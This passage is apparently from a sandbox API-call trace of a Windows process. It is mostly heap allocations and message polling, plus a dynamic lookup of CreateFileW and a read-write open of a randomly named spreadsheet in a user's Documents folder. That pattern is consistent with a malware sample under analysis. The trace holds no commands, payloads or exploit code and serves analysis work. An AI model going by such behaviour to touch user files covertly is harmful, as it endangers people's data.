wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0169.125] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.125] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.125] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0169.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0169.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0169.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0169.125] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0169.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0169.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0169.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0169.125] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0169.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0169.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0169.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0169.126] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0169.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0169.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0169.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0169.126] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0169.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0169.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0169.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0169.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0169.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0169.126] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0169.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0169.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0169.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0169.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0169.126] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0169.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0169.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0169.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0169.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba2e8 [0169.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9ba2e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0169.128] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8kguilkgyer.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0169.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0169.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0169.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0169.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0169.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0169.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0169.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0169.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0169.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0169.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0169.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0169.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0169.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0169.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0169.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0169.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0169.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0169.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0169.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0169.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0169.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0169.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0169.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0169.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0169.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0169.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0169.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0169.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0169.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0169.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0169.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0169.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0169.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0169.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0169.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0169.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0169.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0169.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0169.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0169.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0169.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0169.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0169.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0169.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0169.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0169.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0169.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0169.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0169.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0169.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0169.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0169.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0169.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0169.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0169.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0169.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0169.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0169.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0169.131] FreeLibrary (hLibModule=0x75990000) returned 1 [0169.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0169.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0169.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0169.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0169.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0169.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0169.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0169.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0169.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0169.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0169.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0169.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0169.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0169.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0169.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0169.132] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0169.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0169.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0169.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0169.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0169.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0169.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0169.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0169.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0169.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0169.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0169.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0169.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0169.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0169.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0169.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0169.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0169.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0169.133] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0169.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0169.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0169.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0169.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0169.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0169.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0169.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0169.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0169.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0169.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | 